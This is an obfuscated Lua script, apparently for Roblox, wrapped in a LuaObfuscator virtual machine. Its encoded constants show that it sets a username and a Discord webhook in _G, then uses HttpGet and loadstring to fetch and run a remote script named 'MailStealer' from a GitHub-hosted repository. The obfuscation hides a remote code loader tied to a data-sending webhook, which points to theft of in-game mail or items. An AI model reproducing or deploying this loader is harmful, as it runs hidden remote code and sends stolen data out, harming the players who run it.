--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + (1838 -(1523 + 114)))))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=(1 + 0 + 1)^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (878 -((401 -119) + 595))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (1069 -(68 + 997)) ;return (v37 * (16778486 -(226 + 1044))) + (v36 * (285370 -219834)) + (v35 * (373 -(32 + 84 + 1))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=1695 -(1229 + 466) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=(578 -(386 + 192))) then else v39=0;v40=nil;v38=1;end if (v38~=(1207 -(696 + 510))) then else v41=nil;v42=nil;v38=2;end if (3==v38) then v45=nil;v46=nil;v38=7 -3 ;end if (v38~=4) then else while true do if (v39~=(1262 -(1091 + 171))) then else local v98=0 + 0 ;while true do if ((0 -0)~=v98) then else v40=0;v41=nil;v98=3 -2 ;end if (v98==1) then v39=1;break;end end end if (v39==(376 -(123 + 251))) then local v99=0;while true do if (v99~=(0 -0)) then else v44=nil;v45=nil;v99=1;end if (v99==(699 -(208 + 490))) then v39=3;break;end end end if (v39~=(1 + 0)) then else local v100=0 + 0 ;local v101;while true do if (v100~=(836 -(660 + 176))) then else v101=0 + 0 ;while true do if (v101==(202 -(14 + 188))) then v42=nil;v43=nil;v101=1;end if (v101==1) then v39=677 -(534 + 141) ;break;end end break;end end end if (v39==(2 + 1)) then v46=nil;while true do local v102=0 + 0 ;local v103;while true do if (v102==0) then v103=0 + 0 ;while true do if (v103==1) then if (v40==(0 -0)) then local v155=0;local v156;while true do if (v155==0) then v156=0 -0 ;while true do if (v156==(2 -1)) then v43={};v44={v41,v42,nil,v43};v156=2;end if (v156==0) then local v162=0;while true do if (v162==0) then local v169=396 -(115 + 281) ;while true do if (0~=v169) then else v41={};v42={};v169=1;end if (v169~=1) then else v162=2 -1 ;break;end end end if (v162~=(1 + 0)) then else v156=1;break;end end end if (v156~=2) then else v40=1;break;end end break;end end end break;end if (v103~=(0 -0)) then else local v145=0 -0 ;while true do if (v145==(868 -(550 + 317))) then v103=1;break;end if (v145==(0 -0)) then if (v40==(1 -0)) then local v159=0 -0 ;local v160;while true do if ((285 -(134 + 151))==v159) then v160=1665 -(970 + 695) ;while true do if (v160~=1) then else local v170=0 -0 ;while true do if (v170==(1991 -(582 + 1408))) then v160=6 -4 ;break;end if (v170~=(0 -0)) then else local v172=0;while true do if (v172==(0 -0)) then for v180=1825 -(1195 + 629) ,v45 do local v181=0;local v182;local v183;while true do if (v181~=1) then else if (v182==(1 -0)) then v183=v22()~=0 ;elseif (v182==2) then v183=v25();elseif (v182~=(244 -(187 + 54))) then else v183=v26();end v46[v180]=v183;break;end if (v181~=0) then else local v186=780 -(162 + 618) ;local v187;while true do if (v186~=0) then else v187=0 + 0 ;while true do if ((0 + 0)==v187) then local v197=0;while true do if (v197~=0) then else v182=v22();v183=nil;v197=1 -0 ;end if (1~=v197) then else v187=1 -0 ;break;end end end if (v187==(1 + 0)) then v181=1637 -(1373 + 263) ;break;end end break;end end end end end v44[3]=v22();v172=1001 -(451 + 549) ;end if (1==v172) then v170=1 + 0 ;break;end end end end end if (v160==0) then local v171=0;while true do if (v171==0) then local v173=0 -0 ;while true do if (v173~=0) then else v45=v24();v46={};v173=1;end if (v173==(1 -0)) then v171=1;break;end end end if (v171~=(1385 -(746 + 638))) then else v160=1 + 0 ;break;end end end if (v160~=(2 -0)) then else v40=2;break;end end break;end end end if (v40==(343 -(218 + 123))) then local v161=0;while true do if (v161==0) then for v163=1,v24() do local v164=1581 -(1535 + 46) ;local v165;local v166;while true do if (v164~=(0 + 0)) then else v165=0;v166=nil;v164=1 + 0 ;end if (v164==1) then while true do if (v165~=0) then else v166=v22();if (v21(v166,1,561 -(306 + 254) )==0) then local v175=0 + 0 ;local v176;local v177;local v178;local v179;while true do if (2==v175) then while true do if (v176==(0 -0)) then local v188=1467 -(899 + 568) ;while true do if ((0 + 0)==v188) then local v194=0;while true do if (v194~=(0 -0)) then else local v198=603 -(268 + 335) ;while true do if (v198~=(290 -(60 + 230))) then else v177=v21(v166,2,3);v178=v21(v166,576 -(426 + 146) ,6);v198=1 + 0 ;end if (v198==(1457 -(282 + 1174))) then v194=812 -(569 + 242) ;break;end end end if (v194~=(2 -1)) then else v188=1;break;end end end if ((1 + 0)==v188) then v176=1;break;end end end if (v176~=(1027 -(706 + 318))) then else if (v21(v178,1254 -(721 + 530) ,1274 -(945 + 326) )==(2 -1)) then v179[4]=v46[v179[4]];end v41[v163]=v179;break;end if (v176==2) then local v190=0 + 0 ;while true do if (v190~=0) then else local v195=700 -(271 + 429) ;while true do if (v195==(1 + 0)) then v190=1;break;end if (v195==(1500 -(1408 + 92))) then local v199=0;while true do if (v199~=(1086 -(461 + 625))) then else if (v21(v178,1,1289 -(993 + 295) )==(1 + 0)) then v179[1173 -(418 + 753) ]=v46[v179[1 + 1 ]];end if (v21(v178,2,2)~=(1 + 0)) then else v179[3]=v46[v179[3]];end v199=1 + 0 ;end if (v199==(1 + 0)) then v195=530 -(406 + 123) ;break;end end end end end if (v190==1) then v176=1772 -(1749 + 20) ;break;end end end if (v176~=(1 + 0)) then else local v191=1322 -(1249 + 73) ;while true do if (v191==1) then v176=2;break;end if (v191~=(0 + 0)) then else local v196=0;while true do if (1==v196) then v191=1146 -(466 + 679) ;break;end if ((0 -0)==v196) then v179={v23(),v23(),nil,nil};if (v177==0) then local v200=0;local v201;local v202;while true do if (v200~=0) then else v201=0;v202=nil;v200=1;end if (v200==1) then while true do if (0~=v201) then else v202=0 -0 ;while true do if (v202==0) then v179[7 -4 ]=v23();v179[4]=v23();break;end end break;end end break;end end elseif (v177==(115 -(4 + 110))) then v179[587 -(57 + 527) ]=v24();elseif (v177==(1429 -(41 + 1386))) then v179[3]=v24() -(2^16) ;elseif (v177~=(106 -(17 + 86))) then else local v209=0 + 0 ;local v210;local v211;while true do if (v209~=1) then else while true do if (v210==(0 -0)) then v211=0 -0 ;while true do if (0==v211) then v179[3]=v24() -((168 -(122 + 44))^16) ;v179[6 -2 ]=v23();break;end end break;end end break;end if (v209~=0) then else v210=0 -0 ;v211=nil;v209=1 + 0 ;end end end v196=1;end end end end end end break;end if (v175==0) then local v184=0;while true do if (v184~=(0 + 0)) then else v176=0 -0 ;v177=nil;v184=1;end if (v184~=1) then else v175=66 -(30 + 35) ;break;end end end if ((1 + 0)==v175) then v178=nil;v179=nil;v175=2;end end end break;end end break;end end end for v167=1,v24() do v42[v167-1 ]=v29();end v161=1;end if (v161==(1258 -(1043 + 214))) then return v44;end end end v145=3 -2 ;end end end end break;end end end break;end end break;end if (v38~=2) then else v43=nil;v44=nil;v38=1215 -(323 + 889) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=(0 -0) -0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(581 -(361 + 219))) then v50=321 -(53 + 267) ;v51=(v21(v49,1,5 + 15 ) * (((792 -(142 + 235)) -(15 + 398))^((4599 -3585) -(4 + 14 + 964)))) + v48 ;v47=2;end if (0==v47) then v48=v24();v49=v24();v47=3 -2 ;end if (v47==(2 + 0)) then v52=v21(v49,998 -(553 + 424) ,20 + (20 -9) );v53=((v21(v49,882 -(20 + 732 + 98) )==1) and  -(1 + 0)) or ((126 + 1) -(116 + 10)) ;v47=1 + 2 ;end if (v47==(741 -(542 + 196))) then if (v52==(0 -0)) then if (v51==(0 + 0)) then return v53 * (0 + 0) ;else v52=1 + 0 ;v50=0 -0 ;end elseif (v52==((3056 + 2191) -3200)) then return ((v51==(1551 -(1126 + 425))) and (v53 * ((406 -(118 + 287))/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(2144 -(118 + 1003)) ) * (v50 + (v51/(2^52))) ;end end end v26=nil;function v26(v54)local v55=0 + 0 ;local v56;local v57;while true do if (v55==(0 + 0)) then v56=nil;if  not v54 then local v97=0 -0 ;while true do if (v97==((238 -(64 + 174)) + 0)) then v54=v24();if (v54==(0 -0)) then return "";end break;end end end v55=2 -1 ;end if ((1 + 0 + 0)==v55) then v56=v3(v16,v19,(v19 + v54) -(4 -3) );v19=v19 + v54 ;v55=733 -(476 + 255) ;end if (v55==(1132 -(369 + 761))) then v57={};for v91=1 + 0 , #v56 do v57[v91]=v2(v1(v3(v56,v91,v91)));end v55=5 -2 ;end if (v55==((1119 -363) -(239 + 514))) then return v6(v57);end end end v18=5;end if (v18==2) then function v22()local v58=336 -(144 + 192) ;local v59;while true do if (v58==(217 -(18 + 24 + 174))) then return v59;end if (v58==(0 + 0)) then v59=v1(v16,v19,v19);v19=v19 + (1505 -(363 + 1141)) ;v58=(1581 -(1183 + 397)) + 0 ;end end end v23=nil;function v23()local v60,v61=v1(v16,v19,v19 + (5 -3) );v19=v19 + 2 + 0 ;return (v61 * (192 + 64)) + v60 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then v20=v0(v3(v62,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v62,16));if v20 then local v104=v5(v87,v20);v20=nil;return v104;else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v81[3];end elseif (v82<=2) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>3) then local v126=v81[2];local v127=v79[v81[3]];v79[v126 + 1 ]=v127;v79[v126]=v127[v81[4]];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]=v65[v81[3]];elseif (v82==6) then v79[v81[2]]=v65[v81[3]];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=8) then local v111=0;local v112;local v113;while true do if (v111==1) then v79[v112 + 1 ]=v113;v79[v112]=v113[v81[4]];break;end if (v111==0) then v112=v81[2];v113=v79[v81[3]];v111=1;end end elseif (v82>9) then do return;end else local v136=v81[2];local v137,v138=v72(v79[v136](v13(v79,v136 + 1 ,v81[3])));v74=(v138 + v136) -1 ;local v139=0;for v151=v136,v74 do v139=v139 + 1 ;v79[v151]=v137[v139];end end elseif (v82<=15) then if (v82<=12) then if (v82==11) then local v114=v81[2];local v115,v116=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v74=(v116 + v114) -1 ;local v117=0;for v122=v114,v74 do v117=v117 + 1 ;v79[v122]=v115[v117];end else v79[v81[2]]();end elseif (v82<=13) then v79[v81[2]]=v81[3];elseif (v82==14) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v73=v81[3];end elseif (v82<=18) then if (v82<=16) then local v120=v81[2];v79[v120]=v79[v120](v13(v79,v120 + 1 ,v74));elseif (v82>17) then do return;end else v73=v81[3];end elseif (v82<=19) then v79[v81[2]]();elseif (v82>20) then local v142=0;local v143;while true do if (v142==0) then v143=v81[2];v79[v143]=v79[v143](v13(v79,v143 + 1 ,v74));break;end end else v79[v81[2]]=v81[3]~=0 ;end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703083O00557365726E616D6503093O006A616A633O6F657A03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31363130343136343837313738323532312F313271395354535563673062313843386B754A2O78764C7032783036556C7853722D75615863556747726A5849614B6C746E497038676D7A774E554E50687A4C7146795900153O00124O00013O00260E3O000C0001000200040F3O000C0001001205000100033O001205000200043O00200800020002000500122O000400064O0014000500014O000B000200054O001500013O00022O001300010001000100040F3O0014000100260E3O00010001000100040F3O00010001001205000100073O003001000100080009001205000100073O0030010001000A000B00124O00023O00040F3O000100012O000A3O00017O00",v9(),...);end
